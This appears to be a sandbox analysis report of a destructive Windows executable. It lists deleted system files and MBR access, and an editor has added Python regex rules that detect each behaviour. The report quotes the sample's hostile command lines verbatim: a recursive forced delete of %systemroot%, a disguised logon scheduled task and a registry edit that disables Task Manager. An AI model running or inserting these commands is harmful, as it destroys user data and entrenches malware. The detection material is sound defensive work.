Task   Sample                                                                 Resource       Signatures
task1  207804e5663f805c492bb78bf404a16d2db41416120026afb065cf991a48d906.exe  win7v191014    0 signatures
task2  207804e5663f805c492bb78bf404a16d2db41416120026afb065cf991a48d906.exe  win10v191014   0 signatures
General
Target: 207804e5663f805c492bb78bf404a16d2db41416120026afb065cf991a48d906
Sample: 191025-f6ttaqn6da
SHA256: 207804e5663f805c492bb78bf404a16d2db41416120026afb065cf991a48d906
Score: N/A
Malware Config
Signatures
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid   Process
1312  207804e5663f805c492bb78bf404a16d2db41416120026afb065cf991a48d906.exe
Drops file in system dir 64 IoCs
Despite the signature name, every one of the 64 entries is a deletion under C:\Windows, all performed by cmd.exe PID 1920 (the "del %systemroot% /F /S /Q" child in the process tree). The sandbox caps the listing at 64 entries; the real number of files removed by a recursive delete of the system root is far larger.
description   ioc                                                                                                                                 pid   Process
File deleted  C:\Windows\DtcInstall.log  1920  cmd.exe
File deleted  C:\Windows\msdfmap.ini  1920  cmd.exe
File deleted  C:\Windows\PFRO.log  1920  cmd.exe
File deleted  C:\Windows\Professional.xml  1920  cmd.exe
File deleted  C:\Windows\setupact.log  1920  cmd.exe
File deleted  C:\Windows\setuperr.log  1920  cmd.exe
File deleted  C:\Windows\Starter.xml  1920  cmd.exe
File deleted  C:\Windows\system.ini  1920  cmd.exe
File deleted  C:\Windows\TSSysprep.log  1920  cmd.exe
File deleted  C:\Windows\win.ini  1920  cmd.exe
File deleted  C:\Windows\WindowsUpdate.log  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\adodb.dll  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\__AssemblyInfo__.ini  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC\Extensibility\7.0.3300.0__b03f5f7f11d50a3a\extensibility.dll  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC\Extensibility\7.0.3300.0__b03f5f7f11d50a3a\__AssemblyInfo__.ini  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC\Microsoft.Ink\1.0.2201.0__31bf3856ad364e35\Microsoft.Ink.dll  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC\Microsoft.Ink\1.0.2201.0__31bf3856ad364e35\__AssemblyInfo__.ini  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC\Microsoft.Ink\1.7.2600.2180__31bf3856ad364e35\Microsoft.Ink.dll  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC\Microsoft.Ink\1.7.2600.2180__31bf3856ad364e35\__AssemblyInfo__.ini  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\__AssemblyInfo__.ini  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC\Microsoft.StdFormat\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.stdformat.dll  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC\Microsoft.StdFormat\7.0.3300.0__b03f5f7f11d50a3a\__AssemblyInfo__.ini  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC\MSDATASRC\7.0.3300.0__b03f5f7f11d50a3a\msdatasrc.dll  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC\MSDATASRC\7.0.3300.0__b03f5f7f11d50a3a\__AssemblyInfo__.ini  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC\stdole\7.0.3300.0__b03f5f7f11d50a3a\stdole.dll  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC\stdole\7.0.3300.0__b03f5f7f11d50a3a\__AssemblyInfo__.ini  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC_32\AuditPolicyGPManagedStubs.Interop\6.1.0.0__31bf3856ad364e35\AuditPolicyGPManagedStubs.Interop.dll  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC_32\BDATunePIA\6.1.0.0__31bf3856ad364e35\BDATunePIA.dll  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC_32\ehexthost32\6.1.0.0__31bf3856ad364e35\ehexthost32.exe  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC_32\ehexthost32\6.1.0.0__31bf3856ad364e35\ehexthost32.exe.config  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC_32\ISymWrapper\2.0.0.0__b03f5f7f11d50a3a\ISymWrapper.dll  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC_32\mcstoredb\6.1.0.0__31bf3856ad364e35\mcstoredb.dll  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC_32\Microsoft.GroupPolicy.AdmTmplEditor\6.1.0.0__31bf3856ad364e35\Microsoft.GroupPolicy.AdmTmplEditor.dll  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC_32\Microsoft.GroupPolicy.AdmTmplEditor.Resources\6.1.0.0_en_31bf3856ad364e35\Microsoft.GroupPolicy.AdmTmplEditor.Resources.dll  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC_32\Microsoft.GroupPolicy.Interop\2.0.0.0__31bf3856ad364e35\Microsoft.GroupPolicy.Interop.dll  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC_32\Microsoft.Ink\6.1.0.0__31bf3856ad364e35\Microsoft.Ink.dll  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35\Microsoft.Interop.Security.AzRoles.dll  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC_32\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC_32\Microsoft.Transactions.Bridge.Dtc\3.0.0.0__b03f5f7f11d50a3a\Microsoft.Transactions.Bridge.Dtc.dll  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC_32\Microsoft.VisualStudio.Tools.Applications.InteropAdapter\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualStudio.Tools.Applications.InteropAdapter.dll  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC_32\MSBuild\3.5.0.0__b03f5f7f11d50a3a\MSBuild.exe  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC_32\MSBuild\3.5.0.0__b03f5f7f11d50a3a\msbuild.exe.config  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\big5.nlp  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\bopomofo.nlp  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\ksc.nlp  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\normidna.nlp  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\normnfc.nlp  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\normnfd.nlp  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\normnfkc.nlp  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\normnfkd.nlp  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\prc.nlp  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\prcp.nlp  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\xjis.nlp  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC_32\napcrypt\6.1.0.0__31bf3856ad364e35\NAPCRYPT.DLL  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC_32\naphlpr\6.1.0.0__31bf3856ad364e35\NAPHLPR.DLL  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC_32\Policy.1.0.Microsoft.Ink\6.1.0.0__31bf3856ad364e35\Policy.1.0.Microsoft.Ink.config  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC_32\Policy.1.0.Microsoft.Ink\6.1.0.0__31bf3856ad364e35\Policy.1.0.Microsoft.Ink.dll  1920  cmd.exe
File deleted  C:\Windows\assembly\GAC_32\Policy.1.0.Microsoft.Interop.Security.AzRoles\6.1.7600.16385__31bf3856ad364e35\Microsoft.Interop.Security.AzRoles.config  1920  cmd.exe
Drops desktop.ini 1 IoCs
description   ioc                            pid   Process
File deleted  C:\Windows\Fonts\desktop.ini  1920  cmd.exe

Drops Office document 3 IoCs
description   ioc                                   pid   Process
File deleted  C:\Windows\ShellNew\EXCEL12.XLSX     1920  cmd.exe
File deleted  C:\Windows\ShellNew\MSPUB.PUB        1920  cmd.exe
File deleted  C:\Windows\ShellNew\PWRPNT12.PPTX    1920  cmd.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs
description                 pid   Process
Token: SeShutdownPrivilege  1312  207804e5663f805c492bb78bf404a16d2db41416120026afb065cf991a48d906.exe

Suspicious use of SetWindowsHookEx 4 IoCs
pid   Process
1400  conhost.exe
1112  conhost.exe
1104  conhost.exe
844   conhost.exe

Accessing to Master Boot Record (MBR) 1 TTPs 1 IoCs
description                   ioc                  pid   Process
File opened for modification  \??\PhysicalDrive0   1312  207804e5663f805c492bb78bf404a16d2db41416120026afb065cf991a48d906.exe

Suspicious use of WriteProcessMemory 4 IoCs
description                       pid   Process                                                                 procid_target
PID 1312 wrote to memory of 1456  1312  207804e5663f805c492bb78bf404a16d2db41416120026afb065cf991a48d906.exe  28
PID 1312 wrote to memory of 1816  1312  207804e5663f805c492bb78bf404a16d2db41416120026afb065cf991a48d906.exe  27
PID 1816 wrote to memory of 1984  1816  cmd.exe                                                                 32
PID 1312 wrote to memory of 1920  1312  207804e5663f805c492bb78bf404a16d2db41416120026afb065cf991a48d906.exe  34
Processes
(Image paths under C:\Windows\SysWOW64 with command lines naming C:\Windows\System32 are the result of WoW64 file-system redirection: the sample is a 32-bit executable, so its System32 references resolve to SysWOW64.)

C:\Users\Admin\AppData\Local\Temp\207804e5663f805c492bb78bf404a16d2db41416120026afb065cf991a48d906.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\207804e5663f805c492bb78bf404a16d2db41416120026afb065cf991a48d906.exe"
  PID: 1312
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Accessing to Master Boot Record (MBR)
  - Suspicious use of WriteProcessMemory

C:\Windows\system32\conhost.exe
  Command line: \??\C:\Windows\system32\conhost.exe "1145494900162369655018148990691529387095-157741661026531389279276841363457141"
  PID: 1400
  - Suspicious use of SetWindowsHookEx

C:\Windows\SysWOW64\cmd.exe
  Command line: "C:\Windows\System32\cmd.exe" /C schtasks /create /tn "WindowsUpdatev1" /tr "C:\Users\Admin\AppData\Local\Temp\207804e5663f805c492bb78bf404a16d2db41416120026afb065cf991a48d906.exe" /sc onlogon
  PID: 1816
  - Suspicious use of WriteProcessMemory

C:\Windows\SysWOW64\cmd.exe
  Command line: "C:\Windows\System32\cmd.exe" reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  PID: 1456

C:\Windows\system32\conhost.exe
  Command line: \??\C:\Windows\system32\conhost.exe "9201826351812207032-1153075310-833623098-1725515642-36335303-1096284185994470168"
  PID: 1112
  - Suspicious use of SetWindowsHookEx

C:\Windows\system32\conhost.exe
  Command line: \??\C:\Windows\system32\conhost.exe "-1108052224-1798237979-2115346884148494273-10359282406001780152589749911201466850"
  PID: 1104
  - Suspicious use of SetWindowsHookEx

C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /create /tn "WindowsUpdatev1" /tr "C:\Users\Admin\AppData\Local\Temp\207804e5663f805c492bb78bf404a16d2db41416120026afb065cf991a48d906.exe" /sc onlogon
  PID: 1984

C:\Windows\SysWOW64\cmd.exe
  Command line: "C:\Windows\System32\cmd.exe" /C del %systemroot% /F /S /Q
  PID: 1920
  - Drops file in system dir
  - Drops desktop.ini
  - Drops Office document

C:\Windows\system32\conhost.exe
  Command line: \??\C:\Windows\system32\conhost.exe "-239608306-1709560228-1094254200-1555416916-9402214781034493218-1244256140518640572"
  PID: 844
  - Suspicious use of SetWindowsHookEx
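The process tree above records four behaviours a detection engineer would want to alert on: a scheduled task named to look like Windows Update that runs the sample from the user's Temp directory at every logon, a registry policy that disables Task Manager, a recursive forced delete of %systemroot%, and an open-for-write on \??\PhysicalDrive0. The following is an added example by the editor, not the sandbox's own signature code and not anything taken from the sample: it encodes those four behaviours as rules and runs them over process-creation records constructed from the command lines shown in the tree. The ProcEvent field layout (pid, image, cmdline) is an assumption that loosely mirrors a Sysmon event 1; the rule names are the editor's, and the ATT&CK IDs beside them are the current technique IDs (the report itself tags only T1067).

```python
"""Detection rules for the behaviours in the process tree above.

Added example (editor's code, not the sandbox's and not the sample's).  The
events below are constructed from the report's command lines; the field
layout is assumed to resemble a Sysmon process-creation event.
"""
import re
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str
    cmdline: str


SAMPLE = (r"C:\Users\Admin\AppData\Local\Temp"
          r"\207804e5663f805c492bb78bf404a16d2db41416120026afb065cf991a48d906.exe")

# Constructed from the Win7 process tree in the report; conhost entries omitted.
EVENTS = [
    ProcEvent(1312, SAMPLE, '"' + SAMPLE + '"'),
    ProcEvent(1816, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /C schtasks /create /tn "WindowsUpdatev1" /tr "'
              + SAMPLE + '" /sc onlogon'),
    ProcEvent(1456, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" reg add HKCU\Software\Microsoft\Windows'
              r'\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f'),
    ProcEvent(1984, r"C:\Windows\SysWOW64\schtasks.exe",
              'schtasks /create /tn "WindowsUpdatev1" /tr "' + SAMPLE + '" /sc onlogon'),
    ProcEvent(1920, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /C del %systemroot% /F /S /Q'),
]

# Command-line rules.  Names are the editor's; ATT&CK IDs are current technique IDs.
CMDLINE_RULES = {
    "persistence.schtasks_onlogon (T1053.005)": re.compile(
        r"\bschtasks(?:\.exe)?\b.*?/create\b.*?/sc\s+onlogon\b", re.I),
    "defense_evasion.disable_taskmgr (T1112)": re.compile(
        r"\breg(?:\.exe)?\s+add\b.*?\\Policies\\System\b.*?/v\s+DisableTaskMgr\b.*?/d\s+1\b", re.I),
    # del with /S (recurse) and /Q (no prompt) aimed at the system root, in any order.
    "impact.recursive_delete_systemroot (T1485)": re.compile(
        r"\bdel\b(?=.*\s/S\b)(?=.*\s/Q\b).*?(?:%systemroot%|C:\\Windows)", re.I),
}

TASK_ACTION = re.compile(r'/tr\s+"([^"]+)"', re.I)          # the /tr "..." payload of schtasks
USER_TEMP = re.compile(r"\\AppData\\Local\\Temp\\", re.I)    # user-writable staging dir
RAW_DISK = re.compile(r"^(?:\\\?\?|\\\\\.)\\PhysicalDrive\d+$", re.I)  # \??\ or \\.\ device path


def classify(ev: ProcEvent) -> list:
    """Return the sorted rule names that match one process-creation event."""
    hits = [name for name, rx in CMDLINE_RULES.items() if rx.search(ev.cmdline)]
    # A task whose action lives in the user's Temp dir is a stronger signal than
    # the schtasks call alone; a real updater is never installed there.
    m = TASK_ACTION.search(ev.cmdline)
    if m and USER_TEMP.search(m.group(1)):
        hits.append("persistence.task_runs_from_user_temp (T1053.005)")
    return sorted(hits)


def classify_file_op(path: str) -> Optional[str]:
    """Flag an open-for-write on a raw physical disk, i.e. MBR/boot-sector reach."""
    if RAW_DISK.match(path):
        return "impact.raw_disk_write (T1542.003)"
    return None


def scan(events: list) -> dict:
    """Map pid -> matched rules, keeping only processes that tripped something."""
    out = {}
    for ev in events:
        hits = classify(ev)
        if hits:
            out[ev.pid] = hits
    return out


if __name__ == "__main__":
    for pid, hits in scan(EVENTS).items():
        print(pid, hits)
    print(classify_file_op(r"\??\PhysicalDrive0"))  # the IoC from the MBR signature above
```

Run against the constructed events, PIDs 1816 and 1984 trip both scheduled-task rules, 1456 trips the Task Manager rule, 1920 trips the recursive-delete rule, and the sample process itself (1312) trips nothing on its command line alone; its raw-disk open is only visible through the file-operation check, which is why a command-line-only detection would miss the MBR access.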
Network
MITRE ATT&CK Additional techniques
- T1067 Bootkit (raised by the open-for-write on \??\PhysicalDrive0 above; this ID is deprecated in current ATT&CK, where the behaviour is T1542.003 Pre-OS Boot: Bootkit)